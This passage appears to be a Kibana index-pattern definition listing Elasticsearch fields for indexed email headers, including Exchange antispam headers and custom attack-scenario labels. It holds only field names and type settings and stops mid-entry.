"[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"accept-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"accept-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"accept-language\"}}},{\"name\":\"arc-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-authentication-results\"}}},{\"name\":\"arc-message-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-message-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-message-signature\"}}},{\"name\":\"arc-seal\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-seal.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-seal\"}}},{\"name\":\"attackscenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"attackscenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"attackscenario\"}}},{\"name\":\"authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results-original\"}}},{\"name\":\"authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results\"}}},{\"name\":\"content-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-language\"}}},{\"name\":\"content-transfer-encoding\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-transfer-encoding.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-transfer-encoding\"}}},{\"name\":\"content-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-type\"}}},{\"name\":\"date\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"date.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"date\"}}},{\"name\":\"dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"dkim-signature\"}}},{\"name\":\"emailfolder\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"emailfolder.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"emailfolder\"}}},{\"name\":\"feedback-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"feedback-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"feedback-id\"}}},{\"name\":\"from\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"from.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"from\"}}},{\"name\":\"in-reply-to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"in-reply-to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"in-reply-to\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infralogtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infralogtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infralogtype\"}}},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message-id\"}}},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"mime-version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"mime-version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"mime-version\"}}},{\"name\":\"received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received-spf\"}}},{\"name\":\"received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received\"}}},{\"name\":\"references\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"references.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"references\"}}},{\"name\":\"return-path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"return-path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"return-path\"}}},{\"name\":\"subject\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"subject.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"subject\"}}},{\"name\":\"thread-index\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-index.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-index\"}}},{\"name\":\"thread-topic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-topic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-topic\"}}},{\"name\":\"to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"to\"}}},{\"name\":\"x-account-notification-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-account-notification-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-account-notification-type\"}}},{\"name\":\"x-eopattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eopattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eopattributedmessage\"}}},{\"name\":\"x-eoptenantattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eoptenantattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eoptenantattributedmessage\"}}},{\"name\":\"x-forefront-antispam-report-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-forefront-antispam-report-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-forefront-antispam-report-untrusted\"}}},{\"name\":\"x-gm-message-state\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-gm-message-state.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-gm-message-state\"}}},{\"name\":\"x-google-dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-dkim-signature\"}}},{\"name\":\"x-google-smtp-source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-smtp-source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-smtp-source\"}}},{\"name\":\"x-incomingheadercount\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingheadercount.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingheadercount\"}}},{\"name\":\"x-incomingtopheadermarker\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingtopheadermarker.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingtopheadermarker\"}}},{\"name\":\"x-message-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-delivery\"}}},{\"name\":\"x-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-info\"}}},{\"name\":\"x-microsoft-antispam\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-mailbox-delivery\"}}},{\"name\":\"x-microsoft-antispam-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info-original\"}}},{\"name\":\"x-microsoft-antispam-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info\"}}},{\"name\":\"x-microsoft-antispam-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-prvs\"}}},{\"name\":\"x-microsoft-antispam-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-untrusted\"}}},{\"name\":\"x-microsoft-antispam.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata-original\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata\"}}},{\"name\":\"x-ms-exchange-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-authentication-results\"}}},{\"name\":\"x-ms-exchange-crosstenant-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authas\"}}},{\"name\":\"x-ms-exchange-crosstenant-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authsource\"}}},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-fromentityheader\"}}},{\"name\":\"x-ms-exchange-crosstenant-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-network-message-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalarrivaltime\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\"}}},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\"}}},{\"name\":\"x-ms-exchange-eopdirect\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-eopdirect.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-eopdirect\"}}},{\"name\":\"x-ms-exchange-minimumurldomainage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-minimumurldomainage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-minimumurldomainage\"}}},{\"name\":\"x-ms-exchange-organization-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authas\"}}},{\"name\":\"x-ms-exchange-organization-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authsource\"}}},{\"name\":\"x-ms-exchange-organization-expirationinterval\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationinterval.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationinterval\"}}},{\"name\"